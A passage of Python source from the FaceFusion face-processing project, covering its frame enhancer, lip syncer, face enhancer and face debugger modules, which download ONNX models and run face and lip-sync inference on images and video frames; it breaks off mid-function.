'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() def enhance_frame(temp_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() size = get_options('model').get('size') scale = get_options('model').get('scale') temp_height, temp_width = temp_vision_frame.shape[:2] tile_vision_frames, pad_width, pad_height = create_tile_frames(temp_vision_frame, size) for index, tile_vision_frame in enumerate(tile_vision_frames): with conditional_thread_semaphore(facefusion.globals.execution_providers): tile_vision_frame = frame_processor.run(None, { frame_processor.get_inputs()[0].name : prepare_tile_frame(tile_vision_frame) })[0] tile_vision_frames[index] = normalize_tile_frame(tile_vision_frame) merge_vision_frame = merge_tile_frames(tile_vision_frames, temp_width * scale, temp_height * scale, pad_width * scale, pad_height * scale, (size[0] * scale, size[1] * scale, size[2] * scale)) temp_vision_frame = blend_frame(temp_vision_frame, merge_vision_frame) return temp_vision_frame def prepare_tile_frame(vision_tile_frame : VisionFrame) -> VisionFrame: vision_tile_frame = numpy.expand_dims(vision_tile_frame[:, :, ::-1], axis = 0) vision_tile_frame = vision_tile_frame.transpose(0, 3, 1, 2) vision_tile_frame = vision_tile_frame.astype(numpy.float32) / 255 return vision_tile_frame def normalize_tile_frame(vision_tile_frame : VisionFrame) -> VisionFrame: vision_tile_frame = vision_tile_frame.transpose(0, 2, 3, 1).squeeze(0) * 255 vision_tile_frame = vision_tile_frame.clip(0, 255).astype(numpy.uint8)[:, :, ::-1] return vision_tile_frame def blend_frame(temp_vision_frame : VisionFrame, merge_vision_frame : VisionFrame) -> VisionFrame: frame_enhancer_blend = 1 - (frame_processors_globals.frame_enhancer_blend / 100) temp_vision_frame = cv2.resize(temp_vision_frame, (merge_vision_frame.shape[1], merge_vision_frame.shape[0])) temp_vision_frame = cv2.addWeighted(temp_vision_frame, frame_enhancer_blend, merge_vision_frame, 1 - frame_enhancer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : FrameEnhancerInputs) -> VisionFrame: target_vision_frame = inputs.get('target_vision_frame') return enhance_frame(target_vision_frame) def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/lip_syncer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.execution import apply_execution_provider_options from facefusion.face_analyser import get_one_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_mouth_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, warp_face_by_bounding_box, paste_back, create_bounding_box_from_face_landmark_68 from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, AudioFrame, QueuePayload from facefusion.filesystem import is_file, has_audio, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.audio import read_static_voice, get_voice_frame, create_empty_audio_frame from facefusion.filesystem import is_image, is_video, filter_audio_paths from facefusion.common_helper import get_first from facefusion.vision import read_image, read_static_image, write_image, restrict_video_fps from facefusion.processors.frame.typings import LipSyncerInputs from facefusion.voice_extractor import clear_voice_extractor from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'wav2lip_gan': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/wav2lip_gan.onnx', 'path': resolve_relative_path('../.assets/models/wav2lip_gan.onnx') } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.lip_syncer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--lip-syncer-model', help = wording.get('help.lip_syncer_model'), default = config.get_str_value('frame_processors.lip_syncer_model', 'wav2lip_gan'), choices = frame_processors_choices.lip_syncer_models) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.lip_syncer_model = args.lip_syncer_model def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if not has_audio(facefusion.globals.source_paths): logger.error(wording.get('select_audio_source') + wording.get('exclamation_mark'), NAME) return False if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() read_static_voice.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() clear_voice_extractor() def sync_lip(target_face : Face, temp_audio_frame : AudioFrame, temp_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() crop_mask_list = [] temp_audio_frame = prepare_audio_frame(temp_audio_frame) crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), 'ffhq_512', (512, 512)) face_landmark_68 = cv2.transform(target_face.landmarks.get('68').reshape(1, -1, 2), affine_matrix).reshape(-1, 2) bounding_box = create_bounding_box_from_face_landmark_68(face_landmark_68) bounding_box[1] -= numpy.abs(bounding_box[3] - bounding_box[1]) * 0.125 mouth_mask = create_mouth_mask(face_landmark_68) crop_mask_list.append(mouth_mask) box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], facefusion.globals.face_mask_blur, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) close_vision_frame, close_matrix = warp_face_by_bounding_box(crop_vision_frame, bounding_box, (96, 96)) close_vision_frame = prepare_crop_frame(close_vision_frame) with conditional_thread_semaphore(facefusion.globals.execution_providers): close_vision_frame = frame_processor.run(None, { 'source': temp_audio_frame, 'target': close_vision_frame })[0] crop_vision_frame = normalize_crop_frame(close_vision_frame) crop_vision_frame = cv2.warpAffine(crop_vision_frame, cv2.invertAffineTransform(close_matrix), (512, 512), borderMode = cv2.BORDER_REPLICATE) crop_mask = numpy.minimum.reduce(crop_mask_list) paste_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) return paste_vision_frame def prepare_audio_frame(temp_audio_frame : AudioFrame) -> AudioFrame: temp_audio_frame = numpy.maximum(numpy.exp(-5 * numpy.log(10)), temp_audio_frame) temp_audio_frame = numpy.log10(temp_audio_frame) * 1.6 + 3.2 temp_audio_frame = temp_audio_frame.clip(-4, 4).astype(numpy.float32) temp_audio_frame = numpy.expand_dims(temp_audio_frame, axis = (0, 1)) return temp_audio_frame def prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) prepare_vision_frame = crop_vision_frame.copy() prepare_vision_frame[:, 48:] = 0 crop_vision_frame = numpy.concatenate((prepare_vision_frame, crop_vision_frame), axis = 3) crop_vision_frame = crop_vision_frame.transpose(0, 3, 1, 2).astype('float32') / 255.0 return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame[0].transpose(1, 2, 0) crop_vision_frame = crop_vision_frame.clip(0, 1) * 255 crop_vision_frame = crop_vision_frame.astype(numpy.uint8) return crop_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : LipSyncerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') source_audio_frame = inputs.get('source_audio_frame') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = sync_lip(target_face, source_audio_frame, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = sync_lip(target_face, source_audio_frame, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = sync_lip(similar_face, source_audio_frame, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_audio_path = get_first(filter_audio_paths(source_paths)) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) for queue_payload in process_manager.manage(queue_payloads): frame_number = queue_payload['frame_number'] target_vision_path = queue_payload['frame_path'] source_audio_frame = get_voice_frame(source_audio_path, temp_video_fps, frame_number) if not numpy.any(source_audio_frame): source_audio_frame = create_empty_audio_frame() target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_audio_frame = create_empty_audio_frame() target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: source_audio_paths = filter_audio_paths(facefusion.globals.source_paths) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) for source_audio_path in source_audio_paths: read_static_voice(source_audio_path, temp_video_fps) frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/__init__.py File: facefusion/processors/frame/modules/face_enhancer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import get_many_faces, clear_face_analyser, find_similar_faces, get_one_face from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, clear_face_occluder from facefusion.face_helper import warp_face_by_face_landmark_5, paste_back from facefusion.execution import apply_execution_provider_options from facefusion.content_analyser import clear_content_analyser from facefusion.face_store import get_reference_faces from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, is_image, is_video, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image from facefusion.processors.frame.typings import FaceEnhancerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'codeformer': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/codeformer.onnx', 'path': resolve_relative_path('../.assets/models/codeformer.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.2': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.2.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.2.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.3': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.3.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.3.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.4.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.4.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gpen_bfr_256': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_256.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_256.onnx'), 'template': 'arcface_128_v2', 'size': (256, 256) }, 'gpen_bfr_512': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_512.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_512.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gpen_bfr_1024': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_1024.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_1024.onnx'), 'template': 'ffhq_512', 'size': (1024, 1024) }, 'gpen_bfr_2048': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_2048.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_2048.onnx'), 'template': 'ffhq_512', 'size': (2048, 2048) }, 'restoreformer_plus_plus': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/restoreformer_plus_plus.onnx', 'path': resolve_relative_path('../.assets/models/restoreformer_plus_plus.onnx'), 'template': 'ffhq_512', 'size': (512, 512) } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.face_enhancer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--face-enhancer-model', help = wording.get('help.face_enhancer_model'), default = config.get_str_value('frame_processors.face_enhancer_model', 'gfpgan_1.4'), choices = frame_processors_choices.face_enhancer_models) program.add_argument('--face-enhancer-blend', help = wording.get('help.face_enhancer_blend'), type = int, default = config.get_int_value('frame_processors.face_enhancer_blend', '80'), choices = frame_processors_choices.face_enhancer_blend_range, metavar = create_metavar(frame_processors_choices.face_enhancer_blend_range)) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_enhancer_model = args.face_enhancer_model frame_processors_globals.face_enhancer_blend = args.face_enhancer_blend def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() def enhance_face(target_face: Face, temp_vision_frame : VisionFrame) -> VisionFrame: model_template = get_options('model').get('template') model_size = get_options('model').get('size') crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), model_template, model_size) box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], facefusion.globals.face_mask_blur, (0, 0, 0, 0)) crop_mask_list =\ [ box_mask ] if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) crop_vision_frame = prepare_crop_frame(crop_vision_frame) crop_vision_frame = apply_enhance(crop_vision_frame) crop_vision_frame = normalize_crop_frame(crop_vision_frame) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) paste_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) temp_vision_frame = blend_frame(temp_vision_frame, paste_vision_frame) return temp_vision_frame def apply_enhance(crop_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() frame_processor_inputs = {} for frame_processor_input in frame_processor.get_inputs(): if frame_processor_input.name == 'input': frame_processor_inputs[frame_processor_input.name] = crop_vision_frame if frame_processor_input.name == 'weight': weight = numpy.array([ 1 ]).astype(numpy.double) frame_processor_inputs[frame_processor_input.name] = weight with thread_semaphore(): crop_vision_frame = frame_processor.run(None, frame_processor_inputs)[0][0] return crop_vision_frame def prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame[:, :, ::-1] / 255.0 crop_vision_frame = (crop_vision_frame - 0.5) / 0.5 crop_vision_frame = numpy.expand_dims(crop_vision_frame.transpose(2, 0, 1), axis = 0).astype(numpy.float32) return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = numpy.clip(crop_vision_frame, -1, 1) crop_vision_frame = (crop_vision_frame + 1) / 2 crop_vision_frame = crop_vision_frame.transpose(1, 2, 0) crop_vision_frame = (crop_vision_frame * 255.0).round() crop_vision_frame = crop_vision_frame.astype(numpy.uint8)[:, :, ::-1] return crop_vision_frame def blend_frame(temp_vision_frame : VisionFrame, paste_vision_frame : VisionFrame) -> VisionFrame: face_enhancer_blend = 1 - (frame_processors_globals.face_enhancer_blend / 100) temp_vision_frame = cv2.addWeighted(temp_vision_frame, face_enhancer_blend, paste_vision_frame, 1 - face_enhancer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: return enhance_face(target_face, temp_vision_frame) def process_frame(inputs : FaceEnhancerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = enhance_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = enhance_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = enhance_face(similar_face, target_vision_frame) return target_vision_frame def process_frames(source_path : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_path : str, target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/face_debugger.py from typing import Any, List, Literal from argparse import ArgumentParser import cv2 import numpy import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, wording from facefusion.face_analyser import get_one_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_region_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, categorize_age, categorize_gender from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, QueuePayload from facefusion.vision import read_image, read_static_image, write_image from facefusion.processors.frame.typings import FaceDebuggerInputs from facefusion.processors.frame import globals as frame_processors_globals, choices as frame_processors_choices NAME = __name__.upper() def get_frame_processor() -> None: pass def clear_frame_processor() -> None: pass def get_options(key : Literal['model']) -> None: pass def set_options(key : Literal['model'], value : Any) -> None: pass def register_args(program : ArgumentParser) -> None: program.add_argument('--face-debugger-items', help = wording.get('help.face_debugger_items').format(choices = ', '.join(frame_processors_choices.face_debugger_items)), default = config.get_str_list('frame_processors.face_debugger_items', 'face-landmark-5/68 face-mask'), choices = frame_processors_choices.face_debugger_items, nargs = '+', metavar = 'FACE_DEBUGGER_ITEMS') def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_debugger_items = args.face_debugger_items def pre_check() -> bool: return True def post_check() -> bool: return True def pre_process(mode : ProcessMode) -> bool: return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() def debug_face(target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: primary_color = (0, 0, 255) secondary_color = (0, 255, 0) tertiary_color = (255, 255, 0) bounding_box = target_face.bounding_box.astype(numpy.int32) temp_vision_frame = temp_vision_frame.copy() has_face_landmark_5_fallback = numpy.array_equal(target_face.landmarks.get('5'), target_face.landmarks.get('5/68')) has_face_landmark_68_fallback = numpy.array_equal(target_face.landmarks.get('68'), target_face.landmarks.get('68/5')) if 'bounding-box' in frame_processors_globals.face_debugger_items: cv2.rectangle(temp_vision_frame, (bounding_box[0], bounding_box[1]), (bounding_box[2], bounding_box[3]), primary_color, 2) if 'face-mask' in frame_processors_globals.face_debugger_items: crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), 'arcface_128_v2', (512, 512)) inverse_matrix = cv2.invertAffineTransform(affine_matrix) temp_size = temp_vision_frame.shape[:2][::-1] crop_mask_list = [] if 'box' in facefusion.globals.face_mask_types: box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], 0, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) if 'region' in facefusion.globals.face_mask_types: region_mask = create_region_mask(crop_vision_frame, facefusion.globals.face_mask_regions) crop_mask_list.append(region_mask) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) crop_mask = (crop_mask * 255).astype(numpy.uint8) inverse_vision_frame = cv2.warpAffine(crop_mask, inverse_matrix, temp_size) inverse_vision_frame = cv2.threshold(inverse_vision_frame, 100, 255, cv2.THRESH_BINARY)[1] inverse_vision_frame[inverse_vision_frame > 0] = 255 inverse_contours = cv2.findContours(inverse_vision_frame, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)[0] cv2.drawContours(temp_vision_frame, inverse_contours, -1, tertiary_color if has_face_landmark_5_fallback else secondary_color, 2) if 'face-landmark-5' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('5')): face_landmark_5 = target_face.landmarks.get('5').astype(numpy.int32) for index in range(face_landmark_5.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_5[index][0], face_landmark_5[index][1]), 3, primary_color, -1) if 'face-landmark-5/68' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('5/68')): face_landmark_5_68 = target_face.landmarks.get('5/68').astype(numpy.int32) for index in range(face_landmark_5_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_5_68[index][0], face_landmark_5_68[index][1]), 3, tertiary_color if has_face_landmark_5_fallback else secondary_color, -1) if 'face-landmark-68' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('68')): face_landmark_68 = target_face.landmarks.get('68').astype(numpy.int32) for index in range(face_landmark_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_68[index][0], face_landmark_68[index][1]), 3, tertiary_color if has_face_landmark_68_fallback else secondary_color, -1) if 'face-landmark-68/5' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('68')): face_landmark_68 = target_face.landmarks.get('68/5').astype(numpy.int32) for index in range(face_landmark_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_68[index][0], face_landmark_68[index][1]), 3, primary_color, -1) if bounding_box[3] - bounding_box[1] > 50 and bounding_box[2] - bounding_box[0] > 50: top = bounding_box[1] left = bounding_box[0] - 20 if 'face-detector-score' in frame_processors_globals.face_debugger_items: face_score_text = str(round(target_face.scores.get('detector'), 2)) top = top + 20 cv2.putText(temp_vision_frame, face_score_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) if 'face-landmarker-score' in frame_processors_globals.face_debugger_items: face_score_text = str(round(target_face.scores.get('landmarker'), 2)) top = top + 20 cv2.putText(temp_vision_frame, face_score_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, tertiary_color if has_face_landmark_5_fallback else secondary_color, 2) if 'age' in frame_processors_globals.face_debugger_items: face_age_text = categorize_age(target_face.age) top = top + 20 cv2.putText(temp_vision_frame, face_age_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) if 'gender' in frame_processors_globals.face_debugger_items: face_gender_text = categorize_gender(target_face.gender) top = top + 20 cv2.putText(temp_vision_frame, face_gender_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : FaceDebuggerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = debug_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = debug_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = debug_face(similar_face, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 